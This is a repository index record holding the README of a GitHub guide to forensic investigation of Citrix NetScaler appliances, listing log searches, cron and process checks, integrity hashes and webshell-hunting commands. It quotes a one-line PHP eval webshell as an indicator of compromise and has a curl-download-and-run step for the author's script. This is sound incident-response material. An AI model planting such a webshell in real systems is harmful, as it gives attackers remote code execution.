{"id":26731841,"url":"https://github.com/b0lg0r0v/citrix-netscaler-forensics","last_synced_at":"2025-03-28T00:38:54.603Z","repository":{"id":219251144,"uuid":"748568252","full_name":"B0lg0r0v/citrix-netscaler-forensics","owner":"B0lg0r0v","description":"This repository contains a list of artifacts to search for while performing a forensic investigation on Citrix Netscaler appliances.","archived":false,"fork":false,"pushed_at":"2024-01-30T12:49:30.000Z","size":43,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-01-31T10:25:10.195Z","etag":null,"topics":["citrix-adc","citrix-adc-forensics","citrix-netscaler","forensic-analysis","guide","malware"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/B0lg0r0v.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2024-01-26T09:18:39.000Z","updated_at":"2024-01-30T12:52:56.000Z","dependencies_parsed_at":"2024-01-29T10:24:48.632Z","dependency_job_id":"818fd02e-57f9-468a-b7a7-1ce62c0e494b","html_url":"https://github.com/B0lg0r0v/citrix-netscaler-forensics","commit_stats":null,"previous_names":["b0lg0r0v/citrix-adc-forensics","b0lg0r0v/citrix-netscaler-forensics"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B0lg0r0v%2Fcitrix-netscaler-forensics","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B0lg0r0v%2Fcitrix-netscaler-forensics/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B0lg0r0v%2Fcitrix-netscaler-forensics/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B0lg0r0v%2Fcitrix-netscaler-forensics/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/B0lg0r0v","download_url":"https://codeload.github.com/B0lg0r0v/citrix-netscaler-forensics/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245949553,"owners_count":20698916,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["citrix-adc","citrix-adc-forensics","citrix-netscaler","forensic-analysis","guide","malware"],"created_at":"2025-03-28T00:38:53.572Z","updated_at":"2025-03-28T00:38:54.586Z","avatar_url":"https://github.com/B0lg0r0v.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Citrix Netscaler Forensics\nThis repository provides a comprehensive list of commands \u0026 artifacts to search for while performing a forensic investigation on Citrix Netscaler appliances. Contributions are welcome.\u003cbr\u003e\n\n# Table Of Contents\n- [Automated Script](#automated-script)\n- [Manual Forensics](#manual-forensics)\n- [Launch the THOR APT Scanner](#launch-the-thor-apt-scanner)\n- [References](#references)\n\n# Automated Script\nI've made a small shell script which acts as a wrapper around these commands. You can, if you want to automate the process (although I still recommend to double check manually), run the script directly on the ADC appliance.\n\n```\ncurl -o citrix-adc-forensics.sh https://raw.githubusercontent.com/B0lg0r0v/citrix-netscaler-forensics/main/citrix-adc-forensics.sh\nchmod +x citrix-adc-forensics.sh\n./citrix-adc-forensics.sh\n```\n\nThis will generate a `forensics` folder in your current working directory. \n\n# Manual Forensics\n\nGenerally located log files:\n```\n/var/log/*\n```\n\nFailed authentication attempts\n```\nzcat /var/log/ns.log.*.gz | grep \"Authentication is rejected\" | awk '{$1=$2=$3=$4=$5=$6=$7=$8=\"\"; print $0}' | sort | uniq -c | sort -nr\n```\n\nSSH logs\n```\nzcat /var/log/auth.log.*.gz | grep -i \"sshd\" | grep -i \"accepted password\" | awk '{$1=$2=$3=$4=$5=$6=$7=$8=\"\"; sub(/^[[:space:]]+/, \"\"); print \"Accepted password for \" $0}' | uniq -c | sort -nr\n```\n\nSearch for suspicious commands\n```\ncurl\nhostname\nuname\nnobody\nwhoami\nid\n```\n\nSearch for suspicious activity in the http logs\n```\n/var/log/httpaccess.log\n/var/log/httperror.log\n```\n\nLook for suspicious files in these directories. Payloads are often placed here.\n```\n/netscaler/portal/templates\n/var/tmp/netscaler/portal/templates\n```\n\nLook for processes and child processes\n```\nps aux\nps aux | grep nobody\n```\n\nLook for cronjobs and also the cron history\n```\ncrontab -l -u nobody\ncrontab -l -u nsroot\ncrontab -l -u root\n\n/var/log/cron\n```\n\nLook for unauthorized modifications to the crontab file and/or existence of suspicious files in /var/cron/tabs and other locations\n```\nfind / -type f -name “res*” | grep -E ‘res($|\\.[a-z]{3})$’\n```\n\nCheck the file integrity with a md5 sum. Compare them with a 100% secure ADC.\n```\ncd /netscaler ; for i in “nsppe nsaaad nsconf nsreadfile nsconmsg”; do md5 ${i} ; done\n```\n\nCheck for APT5 techniques. This should provide no output. If yes, potential compromise.\n```\nprocstat –v $(pgrep –o –i nsppe) | grep “0x10400000 “ | grep “rwx”\n```\n\nCheck for unusual administrator activity. You can look for the `pb_policy` in the `ns.log` file.\n```\nExample:\n\n\u003clocal0.info\u003e [hostname] pb_policy: Changing pitboss policy from X to Y\n\u003clocal0.info\u003e [hostname] pb_policy: Changing pitboss policy from Y to X\n\nX \u0026 Y are constant values for you system\n```\n\nCheck for potential PHP WebShells\n```\n/var/netscaler/logon/LogonPoint/uiareas/[FILE].php\n\n\ncontent could be something like this:\n\u003c?php http_response_code(201); @eval($_POST[5]);\n\nLook out in the httpaccess.log file for POST requests for the /logon/LogonPoint URL\n\nCommmand1\n\nfgrep -a -e http_response_code -e '$_POST' -r /var/netscaler/ | fgrep -v -e '/var/netscaler/gui/admin_ui' -e '/netscaler/websocketd' -e '/netscaler/ns_gui/admin_ui'\n\nCommand2\n\nfgrep -a -e http_response_code -e '$_POST' -r /var/vpn/ | fgrep -v -e' /var/netscaler/gui/admin_ui' -e '/netscaler/websocketd' -e '/netscaler/ns_gui/admin_ui'\n\nCommand3\n\nfgrep -a -e http_response_code -e '$_POST' -r /netscaler/ | fgrep -v -e '/var/netscaler/gui/admin_ui' -e '/netscaler/websocketd' -e '/netscaler/ns_gui/admin_ui'\n```\n\nCheck for php files excluding folders that have PHP files from them by default\n```\nfind / -type f -name *.php* -not -path \"/var/netscaler/gui/admin_ui/*\" -not -path \"/netscaler/websocketd/*\" -not -path \"/netscaler/ns_gui/admin_ui/*\"\n```\n\nSearch for *setuid* binaries. This is a setuid Privilege Escalation technique.\n```\nfind / -perm -4000 -user root -exec ls -lc {} \\;\n\nnormal files which have the setuid bit set\n\n-r-sr-xr-x 1 root wheel 27872 Jul 10 18:24 /netscaler/ping   \n-r-sr-xr-x 1 root wheel 32656 Jul 10 18:24 /netscaler/ping6   \n-r-sr-xr-x 1 root wheel 31844 Jul 10 18:24 /netscaler/traceroute  \n-r-sr-xr-x 1 root wheel 24784 Jul 10 18:24 /netscaler/traceroute6   \n-r-sr-xr-- 1 root operator 10584 Jul 10 18:09 /sbin/mksnap_ffs   \n-r-sr-xr-- 2 root operator 15936 Jul 10 18:09 /sbin/shutdown   \n-r-sr-xr-- 2 root operator 15936 Jul 10 18:09 /sbin/poweroff   \n-r-sr-xr-x 1 root wheel 34352 Jul 10 18:09 /usr/bin/crontab   \n-r-sr-xr-x 1 root wheel 11632 Jul 10 18:09 /usr/bin/lock   \n-r-sr-xr-x 1 root wheel 24552 Jul 10 18:09 /usr/bin/login   \n-r-sr-xr-x 1 root wheel 9736 Jul 10 18:09 /usr/bin/passwd   \n-r-sr-xr-x 1 root wheel 16408 Jul 10 18:09 /usr/bin/su   \n-r-sr-xr-x 1 root wheel 74008 Jul 10 18:09 /usr/libexec/ssh-keysign\n```\n\n# Launch the THOR APT Scanner\n[@Neo23x0](https://github.com/Neo23x0) a.k.a Florian Roth did a pretty good guide on how to use the free version of the THOR APT Scanner to scan the Citrix ADC.\u003cbr\u003e\u003cbr\u003e\nFollow the link: https://www.nextron-systems.com/2020/01/14/automated-citrix-netscaler-forensic-analysis-with-thor/\n\n\n# References\n2024-01-26, https://trustedsec.com/blog/netscaler-remote-code-execution-forensics\u003cbr\u003e\n2024-01-26, https://www.mandiant.com/resources/blog/session-hijacking-citrix-cve-2023-4966\u003cbr\u003e\n2024-01-26, https://support.citrix.com/article/CTX227560/citrix-adc-logs-collection-guide\u003cbr\u003e\n2024-01-26, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a\u003cbr\u003e\n2024-01-26, https://www.nextron-systems.com/2020/01/14/automated-citrix-netscaler-forensic-analysis-with-thor/\u003cbr\u003e\n2024-01-26, https://media.defense.gov/2022/Dec/13/2003131586/-1/-1/0/CSA-APT5-CITRIXADC-V1.PDF\u003cbr\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb0lg0r0v%2Fcitrix-netscaler-forensics","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fb0lg0r0v%2Fcitrix-netscaler-forensics","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb0lg0r0v%2Fcitrix-netscaler-forensics/lists"}